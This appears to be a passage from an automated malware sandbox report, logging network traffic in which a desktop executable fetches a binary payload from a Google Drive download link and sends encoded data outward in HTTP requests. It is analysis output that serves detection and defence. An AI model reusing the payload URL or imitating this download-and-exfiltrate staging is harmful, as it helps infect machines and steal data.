                                                                                                                                                                                          Data Ascii: l9JN8TtNOG2cBfNqqCW3oE+vmtLhO/dmd7pa2yAPRgRBDJJ4hQGVAkh/I/zpFZXC1ATvwSL7Z72HsCbh2KL7lSHyxmRDDS+mXcDASQWr06PSLEJEsD9sV07OAkBIxwKxWbnS8v+RihGxCPvjkPe87BFK15Yxu5FzgZv9hPMSsEp2f6NLr4QRVOjiOfD9XD6uMHDBlWnsWKk1BbgcwkJx5rwAl/PYdmsjzs26nvhaExcrFYci/G9
                                                                                                                                                                                          Aug 10, 2023 10:19:17.646995068 CEST430OUTData Raw: 58 55 78 54 42 71 31 47 39 49 66 6e 43 6e 72 41 43 56 67 75 74 6d 33 55 67 45 52 78 50 74 46 4a 61 4e 72 44 45 47 4f 4c 50 2f 47 4e 48 44 2b 68 50 51 56 5a 37 43 34 79 68 34 63 4f 74 6a 45 41 58 66 36 5a 52 49 42 58 66 38 74 64 63 50 53 52 62 30
                                                                                                                                                                                          Data Ascii: XUxTBq1G9IfnCnrACVgutm3UgERxPtFJaNrDEGOLP/GNHD+hPQVZ7C4yh4cOtjEAXf6ZRIBXf8tdcPSRb0pImBZwpyGet/cPhNcGIernPcceCgmpThwXeP7bML/3gojsP62g3GUCKx04icgeCgpu9K9c4ptxmK//P9nfK4MdbvRu7Y3P+jLCVax5KQVpszycjEzOscPGDJfMj+xdf6pW0Nnl1OGWbW+Id5cWfhBIPaQLs7tnMXo
                                                                                                                                                                                          Aug 10, 2023 10:19:17.647155046 CEST438OUTData Raw: 77 59 6e 31 44 38 76 33 6d 7a 6c 46 4d 73 37 53 45 4a 7a 6d 4e 4f 33 64 33 63 75 4f 50 33 54 56 63 4f 74 38 6b 48 77 75 66 52 6b 4e 39 76 74 4b 33 39 75 5a 49 4c 36 52 6e 68 64 68 4c 32 4f 42 59 43 35 2f 57 51 69 4b 38 6b 45 4e 2f 39 4f 6f 55 76
                                                                                                                                                                                          Data Ascii: wYn1D8v3mzlFMs7SEJzmNO3d3cuOP3TVcOt8kHwufRkN9vtK39uZIL6RnhdhL2OBYC5/WQiK8kEN/9OoUvEM1RW+5r4FanIpph8hH/7aqzczUm/2OmqRDwWnHpla7caitr72l6R0N4guvLfkk7F98oDoCqcNAedp6mJKO4sa/s0QOSzg8waqi0BZSiTtCx6KcLLgYYTDekGQbbq9azpPdP4uruFXhBllW/1lNagsbMHqfibbcOc
                                                                                                                                                                                          Aug 10, 2023 10:19:17.647288084 CEST439OUTData Raw: 4d 2b 65 48 77 36 78 5a 5a 71 56 35 57 33 72 67 4d 58 58 38 4c 70 62 77 72 63 6d 54 32 6b 6a 76 34 6a 78 59 6a 6f 75 68 75 72 55 71 53 53 38 72 78 59 49 32 44 5a 43 76 66 52 73 2b 66 2f 6b 57 33 7a 41 6e 61 59 34 73 57 47 76 41 72 44 78 56 55 47
                                                                                                                                                                                          Data Ascii: M+eHw6xZZqV5W3rgMXX8LpbwrcmT2kjv4jxYjouhurUqSS8rxYI2DZCvfRs+f/kW3zAnaY4sWGvArDxVUG4b5Gm6Nkg7FqMpuVf7pqTR8G77ll1XM+Ex0d/hAq2jNZlhjIAkJfFrlaUUoXO5gqe+s7bLlIniCOJ35td3WTZCE4XZ1OamTzUcfB+QMLrdMnHhOEJpuGyAZuGRXUtsRP5g0Jn2CXwsAihbmJ6QZFs3/lI7QQqSnxZ
                                                                                                                                                                                          Aug 10, 2023 10:19:17.647459984 CEST440OUTData Raw: 54 65 4b 4a 55 2b 48 51 32 7a 73 51 2b 77 50 73 4e 64 31 55 79 63 54 69 63 4d 42 4e 6b 34 43 49 43 6e 49 33 5a 77 70 7a 38 70 73 62 4d 6f 66 61 75 51 49 39 6c 68 74 64 68 50 6d 56 46 2f 6a 52 41 54 4f 4c 30 67 2b 30 42 2f 38 47 6f 6b 6d 4b 69 57
                                                                                                                                                                                          Data Ascii: TeKJU+HQ2zsQ+wPsNd1UycTicMBNk4CICnI3Zwpz8psbMofauQI9lhtdhPmVF/jRATOL0g+0B/8GokmKiWeL+SH9k/Bxh3bVqLlmsEQfQjCaLrOCXe6tn8zvS0dsKVrlBYMGXUEoqHW1DJ4mG+7VFhYnEwJRhpum/c/tM7RWxPIcr++c0jzI/ziinUdkU/T78NlKPtk9P46mKPqea3BKbNbZIDQ7QamC402NwSWJyamni+jZ3Kl
                                                                                                                                                                                          Aug 10, 2023 10:19:17.816859961 CEST443OUTData Raw: 6a 44 48 30 68 6e 55 54 71 6c 54 42 36 75 43 57 33 77 44 66 68 4d 72 48 49 55 73 4d 48 6e 68 51 74 71 70 41 42 4f 2f 66 2b 33 70 64 58 55 71 76 6e 66 69 4b 47 58 47 6e 43 4f 52 7a 32 33 55 35 4e 75 55 53 51 38 42 49 6e 6a 37 77 47 46 30 77 7a 63
                                                                                                                                                                                          Data Ascii: jDH0hnUTqlTB6uCW3wDfhMrHIUsMHnhQtqpABO/f+3pdXUqvnfiKGXGnCORz23U5NuUSQ8BInj7wGF0wzcxwOrWqaF3wW0VtqaaqANVM7awgoK5bm8AXVAeU6RhORwVywyrlLR+P7DXZTnwBpYIczn9UPZ0iJC834P4rb8KCUBK1J5YG44+lbpQDBMwOjW11/iFYf4edFWrB0WD+kqkgumeE09xyeXg/qmO2wjCjnl9ZmvJdFGo
                                                                                                                                                                                          Aug 10, 2023 10:19:17.816967010 CEST445OUTData Raw: 42 44 4e 39 32 4e 70 32 48 4b 4d 49 2f 31 43 47 55 6a 6c 77 4a 34 37 6c 4c 52 7a 6f 59 45 73 4c 4c 2f 68 55 49 48 62 78 51 46 38 4b 61 55 52 7a 42 43 6f 68 54 71 4e 46 52 32 4b 31 75 50 45 79 73 68 77 63 2f 30 44 7a 65 46 44 42 2b 68 45 4f 75 48
                                                                                                                                                                                          Data Ascii: BDN92Np2HKMI/1CGUjlwJ47lLRzoYEsLL/hUIHbxQF8KaURzBCohTqNFR2K1uPEyshwc/0DzeFDB+hEOuHicMwT2NyVk8RPOfnBg9rf1N0oiiRYrWV4cQoaV3oxzh89ZdGrrwbpfXk9xEqsLTzHdDMeQfDuOGtKbyCxt/H78nqdvoMXSBi6FFfm2ZKnnLfi5jrr9u0YBxdQVKcerY+xCQZufxIzpPY0GrGXuI4BEuxm6qDiRMsf
                                                                                                                                                                                          Aug 10, 2023 10:19:18.098489046 CEST457INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:17 GMT
                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                          Content-Length: 38381
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 31 20 32 38 38 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 34 35 2e 38 22 20 63 79 3d 22 38 36 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 35 20 32 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="445.8" cy="867.7" r="3.7" transform="translate(-346.5 298.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx=
                                                                                                                                                                                          Aug 10, 2023 10:19:18.098521948 CEST459INData Raw: 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 30 2e 31 20 32 39 33 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65
                                                                                                                                                                                          Data Ascii: "438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="
                                                                                                                                                                                          Aug 10, 2023 10:19:18.098543882 CEST460INData Raw: 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 37 2e 39 22 20 63 79 3d 22 38 31 30 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65
                                                                                                                                                                                          Data Ascii: ll: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(-306.7 310.1) rotate(-27.1)" style="fil
                                                                                                                                                                                          Aug 10, 2023 10:19:18.098566055 CEST461INData Raw: 32 20 33 31 38 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 31 39 2e 37 22 20 63 79 3d 22 38 31
                                                                                                                                                                                          Data Ascii: 2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="534.7" cy="822.9" r="3.7" transform="translate(-316.3
                                                                                                                                                                                          Aug 10, 2023 10:19:18.098753929 CEST463INData Raw: 37 39 30 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 33 20 33 34 37 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65
                                                                                                                                                                                          Data Ascii: 790.5" r="3.7" transform="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590" cy="782
                                                                                                                                                                                          Aug 10, 2023 10:19:18.098783970 CEST464INData Raw: 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 34 38 22 20 63 79 3d 22 37 34 37 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36 39 2e 34 20 33 37 37 2e 35 29 20 72
                                                                                                                                                                                          Data Ascii: <circle cx="648" cy="747.5" r="3.7" transform="translate(-269.4 377.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="643.5" cy="727.1" r="3.7" transform="translate(-260.6 373.2) rotate(-27.1)" style="fill: #ffe029"/>
                                                                                                                                                                                          Aug 10, 2023 10:19:18.098953009 CEST465INData Raw: 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 39 34 2e 37 22 20 63 79 3d 22 37 36 37 2e 39 22 20 72
                                                                                                                                                                                          Data Ascii: 1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="594.7" cy="767.9" r="3.7" transform="translate(-284.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.7" cy="773.4" r="3.7" transform="translate(-289.3 346.9
                                                                                                                                                                                          Aug 10, 2023 10:19:18.098983049 CEST466INData Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 34 37 2e 33 20 33 33 36 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09
                                                                                                                                                                                          Data Ascii: ="3.7" transform="translate(-247.3 336.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="559.1" cy="669.7" r="3.7" transform="translate(-243.8 328.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="558.2" cy="686.9" r=
                                                                                                                                                                                          Aug 10, 2023 10:19:18.099136114 CEST468INData Raw: 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 35 36 2e 33 22 20 63 79 3d 22 37 30 33 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 39 2e 37 20 33 33 30 2e 39 29
                                                                                                                                                                                          Data Ascii: <circle cx="556.3" cy="703.9" r="3.7" transform="translate(-259.7 330.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="552.7" cy="720.2" r="3.7" transform="translate(-267.5 331.1) rotate(-27.1)" style="fill: #ffe029"/>
                                                                                                                                                                                          Aug 10, 2023 10:19:18.099164963 CEST469INData Raw: 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 31 22 20 63 79 3d 22 37 31 37 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61
                                                                                                                                                                                          Data Ascii: e(-27.1)" style="fill: #ffe029"/> <circle cx="501" cy="717.2" r="3.7" transform="translate(-271.8 307.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.1" cy="704.7" r="3.7" transform="translate(-267.6 299.4) rotate(-
                                                                                                                                                                                          Aug 10, 2023 10:19:18.268723011 CEST470INData Raw: 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 34 30 2e 32 20 32 39 36 2e 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c
                                                                                                                                                                                          Data Ascii: rm="translate(-240.2 296.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="478.7" cy="654.5" r="3.7" transform="translate(-245.7 290.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="477.7" cy="634.1" r="3.7" transfor


                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          0192.168.11.2049715142.250.185.206443C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-08-10 08:17:29 UTC0OUTGET /uc?export=download&id=1ac1-oEkoP2YeI5Q4arlxAmDDETDNVAGt HTTP/1.1
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                          Host: drive.google.com
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2023-08-10 08:17:29 UTC0INHTTP/1.1 303 See Other
                                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:17:29 GMT
                                                                                                                                                                                          Location: https://doc-0g-2c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8tk9bkcje0otiv862ca41hvnkh9akt9l/1691655375000/10072219387490488252/*/1ac1-oEkoP2YeI5Q4arlxAmDDETDNVAGt?e=download&uuid=6226759b-1077-47f6-8c73-64f4b8b57f79
                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                          Content-Security-Policy: script-src 'nonce-BYKA-EHnWnGSNa4QyjI0ww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                          Connection: close


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          1192.168.11.2049716142.250.185.129443C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          2023-08-10 08:17:30 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8tk9bkcje0otiv862ca41hvnkh9akt9l/1691655375000/10072219387490488252/*/1ac1-oEkoP2YeI5Q4arlxAmDDETDNVAGt?e=download&uuid=6226759b-1077-47f6-8c73-64f4b8b57f79 HTTP/1.1
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Host: doc-0g-2c-docs.googleusercontent.com
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2023-08-10 08:17:30 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                          X-GUploader-UploadID: ADPycdv6KrXaBnQjdKS4shGXCAoydRnKO5j_E3ZDLjkBAx6pDdhSv_OfLJ4K4TvHtE7BnIxrJsU8B8cxOwPWUIMkxK3Yjps1qLY1
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Content-Disposition: attachment; filename="mkGJWCzBqRz119.bin"; filename*=UTF-8''mkGJWCzBqRz119.bin
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Content-Length: 215616
                                                                                                                                                                                          Last-Modified: Tue, 08 Aug 2023 06:33:36 GMT
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:17:30 GMT
                                                                                                                                                                                          Expires: Thu, 10 Aug 2023 08:17:30 GMT
                                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                                          X-Goog-Hash: crc32c=7HNSUg==
                                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                          Connection: close
